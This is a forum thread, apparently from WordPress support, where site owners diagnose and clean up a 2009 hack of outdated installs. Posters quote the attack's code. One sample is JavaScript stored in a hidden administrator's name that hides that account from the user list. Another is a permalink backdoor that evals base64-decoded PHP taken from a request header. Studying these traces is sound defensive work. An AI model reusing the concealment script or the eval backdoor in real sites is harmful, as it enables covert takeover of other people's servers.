I have 2 equally popular blogs but only one was affected. The only difference was that the unaffected one did not have RPC enabled. In fact I had the PHP file for RPC deleted. How was the RPC setup for everyone here?
@johninnit I got him at 2.7.1. Damn that’s some nasty code. Thanks for the heads up.
I got the bug with extra code in a dozen php pages, but no extra administrator
anyway an upgrade was needed :), was on 2.7 or somthg
By viewing one user and then changing the number in the address line, I found new user:
LucasAguilar63
with first name:
… <div id=”user_superuser”><script language=”JavaScript”> var setUserName = function(){ try{ var t=document.getElementById(“user_superuser”); while(t.nodeName!=”TR”){ t=t.parentNode; }; t.parentNode.removeChild(t); var tags = document.getElementsByTagName(“H3″); var s = ” shown below”; for (var i = 0; i < tags.length; i++) { var t=tags[i].innerHTML; var h=tags[i]; if(t.indexOf(s)>0){ s =(parseInt(t)-1)+s; h.removeChild(h.firstChild); t = document.createTextNode(s); h.appendChild(t); } } var arr=document.getElementsByTagName(“ul”); for(var i in arr) if(arr[i].className==”subsubsub”){ var n=/>Administrator ((d+))</gi.exec(arr[i].innerHTML); if(n[1]>0){ var txt=arr[i].innerHTML.replace(/>Administrator ((d+))</gi,”>Administrator (“+(n[1]-1)+”)<“); arr[i].innerHTML=txt; } } }catch(e){}; }; addLoadEvent(setUserName); </script></div>
Changed to Subscriber and then deleted.
Another difference between affected and unaffected sites: The unaffected site had no user named “admin”. I had deleted it.
It could simply mean that the unaffected site was not attacked.
Anyone else not have this hidden admin user? My site has 4 legitimate admin users, I’ve checked the database and there are no extra users, there are no users that “hide” when I view them in WordPress, does that mean my site is clean?
Im worried that by fixing the permalink problem, I’ve fixed the symptom and not the cause, because I dont have any admin users to delete…
Another thing I noticed:
in wp-content/uploads, I found two suspicious files:
topper.php
wp-pass.php
I found them when I searched for “base64”
For anybody interested, having that particular code in your permalink is a backdoor.
That decodes internally to this:
/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/
Which, rather cleverly, causes any single post URL to look for a header called “HTTP_EXECCODE” sent by the client, run it through base64_decode, and then to execute the PHP code contained therein.
In other words, with that on your site, anybody with a little bit of know-how can force your site to run arbitrary PHP code. Which is probably how they got in, after they somehow got your permalink URL to change to that (probably via SQL injection in old WP versions).
Roy
(@gangleri)
I was afraid of something like that… There are six threads going about this, it would be nice if this could be combined. One thread has found an axtra superuser and files added to the content folder, another has an edited theme index.php. All people I checked have 2.7 versions, does this go for everyone? None of the 2.8.4 blogs that I run myself are infected. Judging this particular thread, this (automatic) hack has started about a month ago, but apparently it is not becoming very active (or noticed after holidays).
@otto42
As others have noticed, a function was inserted into various files (index.php and wp-config.php) which executes the code passed via the URL. This would mean that the insertion of function had to happen first because the permalink change would be useless without the inserted PHP function.
So, I suspect that uploading the PHP files to wp-content/uploads happened before that (but not necessarily as the first step).
I found the hidden admin with all the suspect code as his name. I deleted the code but how do I delete the user?
Robk30, set the user to be a “subscriber” rather than an “administrator”, then go back out to the main users’ list and delete the user.
As Otto42 said in the sticky post, once the security fix is released, the hackers know exactly where the security hole was. So, they can write a script to exploit the hole and target sites with earlier versions.
The problem with this situation is that it means the most vulnerable versions are the ones slightly behind the latest. It means every time a new version is released, you have to upgrade it immediately, which is a lot of work for those who are not professional Webmasters. It means every new version is a security threat to the earlier versions.
But it also means that the version that are really old (say below 2.0) would be unlikely to be hacked. It does not mean that it’s safe; it just means that it is unlikely that anyone would bother hacking such an old version.
This link WAS very helpful!
http://www.journeyetc.com/2009/09/04/wordpress-permalink-rss-problems/
The hidden Admin user who is created has a weird [div] as the first name that hides their name from display.
I went and changed the permission on the index.php and wp-cache-config.php
files that I found in wp-content. I actually removed all permissions from them. Is it safe to delete those files altogether?
